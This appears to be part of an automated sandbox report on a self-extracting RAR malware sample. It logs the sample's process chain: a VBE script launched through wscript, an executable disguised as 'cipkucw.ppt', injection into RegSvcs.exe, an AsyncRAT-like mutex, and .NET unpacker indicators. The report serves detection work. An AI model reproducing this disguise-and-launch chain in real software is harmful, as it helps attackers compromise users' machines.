          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\cipkucw.pptCode function: 6_2_00765B27 SetErrorMode,GetDiskFreeSpaceExW,SetErrorMode,6_2_00765B27
          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\cipkucw.pptCode function: 6_2_0075DC9C CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,CloseHandle,6_2_0075DC9C
          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\cipkucw.pptCode function: 6_2_00774089 CoInitialize,CoUninitialize,CoCreateInstance,IIDFromString,VariantInit,VariantClear,6_2_00774089
          Source: C:\Users\user\Desktop\yjOJ1YK5M3.exeCode function: 0_2_0028EBD3 FindResourceW,SizeofResource,LoadResource,LockResource,GlobalAlloc,GlobalLock,CreateStreamOnHGlobal,GdipCreateHBITMAPFromBitmap,GlobalUnlock,GlobalFree,0_2_0028EBD3
          Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeFile created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\RegSvcs.exe.logJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeMutant created: NULL
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3220:120:WilError_03
          Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeMutant created: \Sessions\1\BaseNamedObjects\AsyncMutex_6SI8OkPnk
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3720:120:WilError_03
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3592:120:WilError_03
          Source: C:\Users\user\Desktop\yjOJ1YK5M3.exeFile created: C:\Users\user\AppData\Local\Temp\RarSFX0Jump to behavior
          Source: C:\Users\user\Desktop\yjOJ1YK5M3.exeCommand line argument: 0T,0_2_0029454A
          Source: C:\Users\user\Desktop\yjOJ1YK5M3.exeCommand line argument: sfxname0_2_0029454A
          Source: C:\Users\user\Desktop\yjOJ1YK5M3.exeCommand line argument: sfxstime0_2_0029454A
          Source: C:\Users\user\Desktop\yjOJ1YK5M3.exeCommand line argument: STARTDLG0_2_0029454A
          Source: yjOJ1YK5M3.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
          Source: C:\Users\user\Desktop\yjOJ1YK5M3.exeFile read: C:\Windows\win.iniJump to behavior
          Source: C:\Users\user\Desktop\yjOJ1YK5M3.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
          Source: yjOJ1YK5M3.exeReversingLabs: Detection: 62%
          Source: C:\Users\user\Desktop\yjOJ1YK5M3.exeFile read: C:\Users\user\Desktop\yjOJ1YK5M3.exeJump to behavior
          Source: unknownProcess created: C:\Users\user\Desktop\yjOJ1YK5M3.exe "C:\Users\user\Desktop\yjOJ1YK5M3.exe"
          Source: C:\Users\user\Desktop\yjOJ1YK5M3.exeProcess created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\RarSFX0\pgoh.vbe"
          Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c ipconfig /release
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c cipkucw.ppt xdgrnj.pdf
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\RarSFX0\cipkucw.ppt cipkucw.ppt xdgrnj.pdf
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\ipconfig.exe ipconfig /release
          Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c ipconfig /renew
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\ipconfig.exe ipconfig /renew
          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\cipkucw.pptProcess created: C:\Users\user\AppData\Local\Temp\RegSvcs.exe "C:\Users\user\AppData\Local\Temp\RegSvcs.exe"
          Source: unknownProcess created: C:\Users\user\AppData\Local\Temp\afda\cipkucw.ppt.exe "C:\Users\user\AppData\Local\Temp\afda\CIPKUC~1.EXE" C:\Users\user\AppData\Local\Temp\afda\xdgrnj.pdf
          Source: C:\Users\user\AppData\Local\Temp\afda\cipkucw.ppt.exeProcess created: C:\Users\user\AppData\Local\Temp\RegSvcs.exe "C:\Users\user\AppData\Local\Temp\RegSvcs.exe"
          Source: unknownProcess created: C:\Users\user\AppData\Local\Temp\afda\cipkucw.ppt.exe "C:\Users\user\AppData\Local\Temp\afda\CIPKUC~1.EXE" C:\Users\user\AppData\Local\Temp\afda\xdgrnj.pdf
          Source: C:\Users\user\AppData\Local\Temp\afda\cipkucw.ppt.exeProcess created: C:\Users\user\AppData\Local\Temp\RegSvcs.exe "C:\Users\user\AppData\Local\Temp\RegSvcs.exe"
          Source: unknownProcess created: C:\Users\user\AppData\Local\Temp\afda\cipkucw.ppt.exe "C:\Users\user\AppData\Local\Temp\afda\CIPKUC~1.EXE" C:\Users\user\AppData\Local\Temp\afda\xdgrnj.pdf
          Source: C:\Users\user\AppData\Local\Temp\afda\cipkucw.ppt.exeProcess created: C:\Users\user\AppData\Local\Temp\RegSvcs.exe "C:\Users\user\AppData\Local\Temp\RegSvcs.exe"
          Source: C:\Users\user\Desktop\yjOJ1YK5M3.exeProcess created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\RarSFX0\pgoh.vbe" Jump to behavior
          Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c ipconfig /release Jump to behavior
          Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c cipkucw.ppt xdgrnj.pdfJump to behavior
          Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c ipconfig /renew Jump to behavior
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\ipconfig.exe ipconfig /releaseJump to behavior
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\RarSFX0\cipkucw.ppt cipkucw.ppt xdgrnj.pdfJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\cipkucw.pptProcess created: C:\Users\user\AppData\Local\Temp\RegSvcs.exe "C:\Users\user\AppData\Local\Temp\RegSvcs.exe"Jump to behavior
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\ipconfig.exe ipconfig /renewJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\afda\cipkucw.ppt.exeProcess created: C:\Users\user\AppData\Local\Temp\RegSvcs.exe "C:\Users\user\AppData\Local\Temp\RegSvcs.exe"Jump to behavior
          Source: C:\Users\user\AppData\Local\Temp\afda\cipkucw.ppt.exeProcess created: C:\Users\user\AppData\Local\Temp\RegSvcs.exe "C:\Users\user\AppData\Local\Temp\RegSvcs.exe"
          Source: C:\Users\user\AppData\Local\Temp\afda\cipkucw.ppt.exeProcess created: C:\Users\user\AppData\Local\Temp\RegSvcs.exe "C:\Users\user\AppData\Local\Temp\RegSvcs.exe"
          Source: C:\Users\user\Desktop\yjOJ1YK5M3.exeSection loaded: version.dllJump to behavior
          Source: C:\Users\user\Desktop\yjOJ1YK5M3.exeSection loaded: dxgidebug.dllJump to behavior
          Source: C:\Users\user\Desktop\yjOJ1YK5M3.exeSection loaded: sfc_os.dllJump to behavior
          Source: C:\Users\user\Desktop\yjOJ1YK5M3.exeSection loaded: sspicli.dllJump to behavior
          Source: C:\Users\user\Desktop\yjOJ1YK5M3.exeSection loaded: rsaenh.dllJump to behavior
          Source: C:\Users\user\Desktop\yjOJ1YK5M3.exeSection loaded: uxtheme.dllJump to behavior
          Source: C:\Users\user\Desktop\yjOJ1YK5M3.exeSection loaded: dwmapi.dllJump to behavior
          Source: C:\Users\user\Desktop\yjOJ1YK5M3.exeSection loaded: cryptbase.dllJump to behavior
          Source: C:\Users\user\Desktop\yjOJ1YK5M3.exeSection loaded: riched20.dllJump to behavior
          Source: C:\Users\user\Desktop\yjOJ1YK5M3.exeSection loaded: usp10.dllJump to behavior
          Source: C:\Users\user\Desktop\yjOJ1YK5M3.exeSection loaded: msls31.dllJump to behavior
          Source: C:\Users\user\Desktop\yjOJ1YK5M3.exeSection loaded: kernel.appcore.dllJump to behavior
          Source: C:\Users\user\Desktop\yjOJ1YK5M3.exeSection loaded: windowscodecs.dllJump to behavior
          Source: C:\Users\user\Desktop\yjOJ1YK5M3.exeSection loaded: textshaping.dllJump to behavior
          Source: C:\Users\user\Desktop\yjOJ1YK5M3.exeSection loaded: textinputframework.dllJump to behavior
          Source: C:\Users\user\Desktop\yjOJ1YK5M3.exeSection loaded: coreuicomponents.dllJump to behavior
          Source: C:\Users\user\Desktop\yjOJ1YK5M3.exeSection loaded: coremessaging.dllJump to behavior
          Source: C:\Users\user\Desktop\yjOJ1YK5M3.exeSection loaded: ntmarta.dllJump to behavior
          Source: C:\Users\user\Desktop\yjOJ1YK5M3.exeSection loaded: coremessaging.dllJump to behavior
          Source: C:\Users\user\Desktop\yjOJ1YK5M3.exeSection loaded: wintypes.dllJump to behavior
          Source: C:\Users\user\Desktop\yjOJ1YK5M3.exeSection loaded: wintypes.dllJump to behavior
          Source: C:\Users\user\Desktop\yjOJ1YK5M3.exeSection loaded: wintypes.dllJump to behavior
          Source: C:\Users\user\Desktop\yjOJ1YK5M3.exeSection loaded: windows.storage.dllJump to behavior
          Source: C:\Users\user\Desktop\yjOJ1YK5M3.exeSection loaded: wldp.dllJump to behavior
          Source: C:\Users\user\Desktop\yjOJ1YK5M3.exeSection loaded: propsys.dllJump to behavior
          Source: C:\Users\user\Desktop\yjOJ1YK5M3.exeSection loaded: profapi.dllJump to behavior
          Source: C:\Users\user\Desktop\yjOJ1YK5M3.exeSection loaded: edputil.dllJump to behavior
          Source: C:\Users\user\Desktop\yjOJ1YK5M3.exeSection loaded: urlmon.dllJump to behavior
          Source: C:\Users\user\Desktop\yjOJ1YK5M3.exeSection loaded: iertutil.dllJump to behavior
          Source: C:\Users\user\Desktop\yjOJ1YK5M3.exeSection loaded: srvcli.dllJump to behavior
          Source: C:\Users\user\Desktop\yjOJ1YK5M3.exeSection loaded: netutils.dllJump to behavior
          Source: C:\Users\user\Desktop\yjOJ1YK5M3.exeSection loaded: windows.staterepositoryps.dllJump to behavior
          Source: C:\Users\user\Desktop\yjOJ1YK5M3.exeSection loaded: policymanager.dllJump to behavior
          Source: C:\Users\user\Desktop\yjOJ1YK5M3.exeSection loaded: msvcp110_win.dllJump to behavior
          Source: C:\Users\user\Desktop\yjOJ1YK5M3.exeSection loaded: appresolver.dllJump to behavior
          Source: C:\Users\user\Desktop\yjOJ1YK5M3.exeSection loaded: bcp47langs.dllJump to behavior
          Source: C:\Users\user\Desktop\yjOJ1YK5M3.exeSection loaded: slc.dllJump to behavior
          Source: C:\Users\user\Desktop\yjOJ1YK5M3.exeSection loaded: userenv.dllJump to behavior
          Source: C:\Users\user\Desktop\yjOJ1YK5M3.exeSection loaded: sppc.dllJump to behavior
          Source: C:\Users\user\Desktop\yjOJ1YK5M3.exeSection loaded: onecorecommonproxystub.dllJump to behavior
          Source: C:\Users\user\Desktop\yjOJ1YK5M3.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
          Source: C:\Users\user\Desktop\yjOJ1YK5M3.exeSection loaded: pcacli.dllJump to behavior
          Source: C:\Users\user\Desktop\yjOJ1YK5M3.exeSection loaded: mpr.dllJump to behavior
          Source: C:\Users\user\Desktop\yjOJ1YK5M3.exeSection loaded: windows.fileexplorer.common.dllJump to behavior
          Source: C:\Users\user\Desktop\yjOJ1YK5M3.exeSection loaded: apphelp.dllJump to behavior
          Source: C:\Users\user\Desktop\yjOJ1YK5M3.exeSection loaded: ntshrui.dllJump to behavior
          Source: C:\Users\user\Desktop\yjOJ1YK5M3.exeSection loaded: cscapi.dllJump to behavior
          Source: C:\Windows\SysWOW64\wscript.exeSection loaded: version.dllJump to behavior
          Source: C:\Windows\SysWOW64\wscript.exeSection loaded: kernel.appcore.dllJump to behavior
          Source: C:\Windows\SysWOW64\wscript.exeSection loaded: uxtheme.dllJump to behavior
          Source: C:\Windows\SysWOW64\wscript.exeSection loaded: sxs.dllJump to behavior
          Source: C:\Windows\SysWOW64\wscript.exeSection loaded: vbscript.dllJump to behavior
          Source: C:\Windows\SysWOW64\wscript.exeSection loaded: amsi.dllJump to behavior
          Source: C:\Windows\SysWOW64\wscript.exeSection loaded: userenv.dllJump to behavior
          Source: C:\Windows\SysWOW64\wscript.exeSection loaded: profapi.dllJump to behavior
          Source: C:\Windows\SysWOW64\wscript.exeSection loaded: wldp.dllJump to behavior
          Source: C:\Windows\SysWOW64\wscript.exeSection loaded: msasn1.dllJump to behavior
          Source: C:\Windows\SysWOW64\wscript.exeSection loaded: cryptsp.dllJump to behavior
          Source: C:\Windows\SysWOW64\wscript.exeSection loaded: rsaenh.dllJump to behavior
          Source: C:\Windows\SysWOW64\wscript.exeSection loaded: cryptbase.dllJump to behavior
          Source: C:\Windows\SysWOW64\wscript.exeSection loaded: msisip.dllJump to behavior
          Source: C:\Windows\SysWOW64\wscript.exeSection loaded: wshext.dllJump to behavior
          Source: C:\Windows\SysWOW64\wscript.exeSection loaded: scrobj.dllJump to behavior
          Source: C:\Windows\SysWOW64\wscript.exeSection loaded: mlang.dllJump to behavior
          Source: C:\Windows\SysWOW64\wscript.exeSection loaded: mpr.dllJump to behavior
          Source: C:\Windows\SysWOW64\wscript.exeSection loaded: scrrun.dllJump to behavior
          Source: C:\Windows\SysWOW64\wscript.exeSection loaded: gpapi.dllJump to behavior
          Source: C:\Windows\SysWOW64\wscript.exeSection loaded: windows.storage.dllJump to behavior
          Source: C:\Windows\SysWOW64\wscript.exeSection loaded: propsys.dllJump to behavior
          Source: C:\Windows\SysWOW64\wscript.exeSection loaded: edputil.dllJump to behavior
          Source: C:\Windows\SysWOW64\wscript.exeSection loaded: urlmon.dllJump to behavior
          Source: C:\Windows\SysWOW64\wscript.exeSection loaded: iertutil.dllJump to behavior
          Source: C:\Windows\SysWOW64\wscript.exeSection loaded: srvcli.dllJump to behavior
          Source: C:\Windows\SysWOW64\wscript.exeSection loaded: netutils.dllJump to behavior
          Source: C:\Windows\SysWOW64\wscript.exeSection loaded: windows.staterepositoryps.dllJump to behavior
          Source: C:\Windows\SysWOW64\wscript.exeSection loaded: sspicli.dllJump to behavior
          Source: C:\Windows\SysWOW64\wscript.exeSection loaded: wintypes.dllJump to behavior
          Source: C:\Windows\SysWOW64\wscript.exeSection loaded: appresolver.dllJump to behavior
          Source: C:\Windows\SysWOW64\wscript.exeSection loaded: bcp47langs.dllJump to behavior
          Source: C:\Windows\SysWOW64\wscript.exeSection loaded: slc.dllJump to behavior
          Source: C:\Windows\SysWOW64\wscript.exeSection loaded: sppc.dllJump to behavior
          Source: C:\Windows\SysWOW64\wscript.exeSection loaded: onecorecommonproxystub.dllJump to behavior
          Source: C:\Windows\SysWOW64\wscript.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
          Source: C:\Windows\SysWOW64\cmd.exeSection loaded: apphelp.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\cipkucw.pptSection loaded: wsock32.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\cipkucw.pptSection loaded: version.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\cipkucw.pptSection loaded: winmm.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\cipkucw.pptSection loaded: mpr.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\cipkucw.pptSection loaded: wininet.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\cipkucw.pptSection loaded: iphlpapi.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\cipkucw.pptSection loaded: userenv.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\cipkucw.pptSection loaded: uxtheme.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\cipkucw.pptSection loaded: kernel.appcore.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\cipkucw.pptSection loaded: sspicli.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\cipkucw.pptSection loaded: windows.storage.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\cipkucw.pptSection loaded: wldp.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\cipkucw.pptSection loaded: ntmarta.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\cipkucw.pptSection loaded: apphelp.dllJump to behavior
          Source: C:\Windows\SysWOW64\ipconfig.exeSection loaded: iphlpapi.dllJump to behavior
          Source: C:\Windows\SysWOW64\ipconfig.exeSection loaded: dhcpcsvc.dllJump to behavior
          Source: C:\Windows\SysWOW64\ipconfig.exeSection loaded: dhcpcsvc6.dllJump to behavior
          Source: C:\Windows\SysWOW64\ipconfig.exeSection loaded: dnsapi.dllJump to behavior
          Source: C:\Windows\SysWOW64\ipconfig.exeSection loaded: iphlpapi.dllJump to behavior
          Source: C:\Windows\SysWOW64\ipconfig.exeSection loaded: dhcpcsvc.dllJump to behavior
          Source: C:\Windows\SysWOW64\ipconfig.exeSection loaded: dhcpcsvc6.dllJump to behavior
          Source: C:\Windows\SysWOW64\ipconfig.exeSection loaded: dnsapi.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\afda\cipkucw.ppt.exeSection loaded: wsock32.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\afda\cipkucw.ppt.exeSection loaded: version.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\afda\cipkucw.ppt.exeSection loaded: winmm.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\afda\cipkucw.ppt.exeSection loaded: mpr.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\afda\cipkucw.ppt.exeSection loaded: wininet.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\afda\cipkucw.ppt.exeSection loaded: iphlpapi.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\afda\cipkucw.ppt.exeSection loaded: userenv.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\afda\cipkucw.ppt.exeSection loaded: uxtheme.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\afda\cipkucw.ppt.exeSection loaded: kernel.appcore.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\afda\cipkucw.ppt.exeSection loaded: sspicli.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\afda\cipkucw.ppt.exeSection loaded: windows.storage.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\afda\cipkucw.ppt.exeSection loaded: wldp.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\afda\cipkucw.ppt.exeSection loaded: ntmarta.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\afda\cipkucw.ppt.exeSection loaded: apphelp.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\afda\cipkucw.ppt.exeSection loaded: wsock32.dll
          Source: C:\Users\user\AppData\Local\Temp\afda\cipkucw.ppt.exeSection loaded: version.dll
          Source: C:\Users\user\AppData\Local\Temp\afda\cipkucw.ppt.exeSection loaded: winmm.dll
          Source: C:\Users\user\AppData\Local\Temp\afda\cipkucw.ppt.exeSection loaded: mpr.dll
          Source: C:\Users\user\AppData\Local\Temp\afda\cipkucw.ppt.exeSection loaded: wininet.dll
          Source: C:\Users\user\AppData\Local\Temp\afda\cipkucw.ppt.exeSection loaded: iphlpapi.dll
          Source: C:\Users\user\AppData\Local\Temp\afda\cipkucw.ppt.exeSection loaded: userenv.dll
          Source: C:\Users\user\AppData\Local\Temp\afda\cipkucw.ppt.exeSection loaded: uxtheme.dll
          Source: C:\Users\user\AppData\Local\Temp\afda\cipkucw.ppt.exeSection loaded: kernel.appcore.dll
          Source: C:\Users\user\AppData\Local\Temp\afda\cipkucw.ppt.exeSection loaded: sspicli.dll
          Source: C:\Users\user\AppData\Local\Temp\afda\cipkucw.ppt.exeSection loaded: windows.storage.dll
          Source: C:\Users\user\AppData\Local\Temp\afda\cipkucw.ppt.exeSection loaded: wldp.dll
          Source: C:\Users\user\AppData\Local\Temp\afda\cipkucw.ppt.exeSection loaded: apphelp.dll
          Source: C:\Users\user\AppData\Local\Temp\afda\cipkucw.ppt.exeSection loaded: wsock32.dll
          Source: C:\Users\user\AppData\Local\Temp\afda\cipkucw.ppt.exeSection loaded: version.dll
          Source: C:\Users\user\AppData\Local\Temp\afda\cipkucw.ppt.exeSection loaded: winmm.dll
          Source: C:\Users\user\AppData\Local\Temp\afda\cipkucw.ppt.exeSection loaded: mpr.dll
          Source: C:\Users\user\AppData\Local\Temp\afda\cipkucw.ppt.exeSection loaded: wininet.dll
          Source: C:\Users\user\AppData\Local\Temp\afda\cipkucw.ppt.exeSection loaded: iphlpapi.dll
          Source: C:\Users\user\AppData\Local\Temp\afda\cipkucw.ppt.exeSection loaded: userenv.dll
          Source: C:\Users\user\AppData\Local\Temp\afda\cipkucw.ppt.exeSection loaded: uxtheme.dll
          Source: C:\Users\user\AppData\Local\Temp\afda\cipkucw.ppt.exeSection loaded: kernel.appcore.dll
          Source: C:\Users\user\AppData\Local\Temp\afda\cipkucw.ppt.exeSection loaded: sspicli.dll
          Source: C:\Users\user\AppData\Local\Temp\afda\cipkucw.ppt.exeSection loaded: windows.storage.dll
          Source: C:\Users\user\AppData\Local\Temp\afda\cipkucw.ppt.exeSection loaded: wldp.dll
          Source: C:\Users\user\AppData\Local\Temp\afda\cipkucw.ppt.exeSection loaded: apphelp.dll
          Source: C:\Users\user\Desktop\yjOJ1YK5M3.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{00BB2765-6A77-11D0-A535-00C04FD7D062}\InProcServer32Jump to behavior
          Source: Window RecorderWindow detected: More than 3 window changes detected
          Source: yjOJ1YK5M3.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
          Source: yjOJ1YK5M3.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
          Source: yjOJ1YK5M3.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
          Source: yjOJ1YK5M3.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
          Source: yjOJ1YK5M3.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
          Source: yjOJ1YK5M3.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
          Source: yjOJ1YK5M3.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
          Source: yjOJ1YK5M3.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
          Source: Binary string: D:\Projects\WinRAR\sfx\build\sfxrar32\Release\sfxrar.pdb source: yjOJ1YK5M3.exe
          Source: Binary string: RegSvcs.pdb, source: RegSvcs.exe, 0000000C.00000000.1873063732.0000000000BD2000.00000002.00000001.01000000.0000000C.sdmp, RegSvcs.exe.6.dr
          Source: Binary string: RegSvcs.pdb source: RegSvcs.exe, 0000000C.00000000.1873063732.0000000000BD2000.00000002.00000001.01000000.0000000C.sdmp, RegSvcs.exe.6.dr
          Source: Binary string: C:\Users\user\AppData\Local\Temp\afda\xdgrnj.pdB source: cipkucw.ppt.exe, 00000011.00000003.2089984383.0000000000B34000.00000004.00000020.00020000.00000000.sdmp
          Source: yjOJ1YK5M3.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
          Source: yjOJ1YK5M3.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
          Source: yjOJ1YK5M3.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
          Source: yjOJ1YK5M3.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
          Source: yjOJ1YK5M3.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata

          Data Obfuscation

          barindex
          .NET source code contains potential unpacker
          Source: 6.3.cipkucw.ppt.f91818.1.raw.unpack, MbvpxzoYoElhnE.cs.Net Code: xnzMYjnJtuXB System.AppDomain.Load(byte[])
          Source: 6.3.cipkucw.ppt.fb2828.0.raw.unpack, MbvpxzoYoElhnE.cs.Net Code: xnzMYjnJtuXB System.AppDomain.Load(byte[])
          Source: 15.3.cipkucw.ppt.exe.175e018.0.raw.unpack, MbvpxzoYoElhnE.cs.Net Code: xnzMYjnJtuXB System.AppDomain.Load(byte[])
          Source: 17.3.cipkucw.ppt.exe.d56820.0.raw.unpack, MbvpxzoYoElhnE.cs.Net Code: xnzMYjnJtuXB System.AppDomain.Load(byte[])
          Source: 17.3.cipkucw.ppt.exe.d35810.1.raw.unpack, MbvpxzoYoElhnE.cs.Net Code: xnzMYjnJtuXB System.AppDomain.Load(byte[])
          Source: 19.3.cipkucw.ppt.exe.1854810.2.raw.unpack, MbvpxzoYoElhnE.cs.Net Code: xnzMYjnJtuXB System.AppDomain.Load(byte[])
          Source: 19.3.cipkucw.ppt.exe.1875820.0.raw.unpack, MbvpxzoYoElhnE.cs.Net Code: xnzMYjnJtuXB System.AppDomain.Load(byte[])
          Source: 19.3.cipkucw.ppt.exe.1854810.1.raw.unpack, MbvpxzoYoElhnE.cs.Net Code: xnzMYjnJtuXB System.AppDomain.Load(byte[])
          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\cipkucw.pptCode function: 6_2_006F5D78 GetVersionExW,GetCurrentProcess,IsWow64Process,LoadLibraryA,GetProcAddress,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,6_2_006F5D78
          Source: C:\Users\user\Desktop\yjOJ1YK5M3.exeFile created: C:\Users\user\AppData\Local\Temp\RarSFX0\__tmp_rar_sfx_access_check_6173281Jump to behavior
          Source: yjOJ1YK5M3.exeStatic PE information: section name: .didat
          Source: C:\Users\user\Desktop\yjOJ1YK5M3.exeCode function: 0_2_00296680 push ecx; ret 0_2_00296693
          Source: C:\Users\user\Desktop\yjOJ1YK5M3.exeCode function: 0_2_00295773 push ecx; ret 0_2_00295786
          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\cipkucw.pptCode function: 6_2_00740332 push edi; ret 6_2_00740333
          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\cipkucw.pptCode function: 6_2_00710E06 push ecx; ret 6_2_00710E19
          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\cipkucw.pptCode function: 6_2_0070DBFC push cs; iretd 6_2_0070DBFD
          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\cipkucw.pptCode function: 6_2_0070DC00 push eax; iretd 6_2_0070DC01
          Source: C:\Users\user\AppData\Local\Temp\afda\cipkucw.ppt.exeCode function: 15_2_01010332 push edi; ret 15_2_01010333
          Source: C:\Users\user\AppData\Local\Temp\afda\cipkucw.ppt.exeCode function: 15_2_00FE0E06 push ecx; ret 15_2_00FE0E19
          Source: C:\Users\user\AppData\Local\Temp\afda\cipkucw.ppt.exeCode function: 15_2_00FDDC00 push eax; iretd 15_2_00FDDC01
          Source: 6.3.cipkucw.ppt.f91818.1.raw.unpack, nEUsGCMtCWeF.csHigh entropy of concatenated method names: 'MkcRCSWyaQ', 'QJrsxPjyHPP', 'aqxJnMSPXGzizqqE', 'BdiZOqLbMQAS', 'fvjMXFzRonmCT', 'HtyOywHBFsudJzv', 'xClNxgMlMfLm', 'aeSEXTiqerkRs', 'xhCRVbSciuMm', 'JDxUVjtXpVIckT'
          Source: 6.3.cipkucw.ppt.f91818.1.raw.unpack, utoIMOcfPuYy.csHigh entropy of concatenated method names: 'OERpoxwXlZYf', 'ddFaDMrhFJfCyvv', 'DbnvmKANtKCZBK', 'TKQelXawMCLja', 'sqKyuhccwsYU', 'QrIYISIdbPF', 'FcfYiHtDofMwv', 'WVjMeBvRagZAQF', 'mqsMnazHHfpS', 'mCSmJupfHPx'
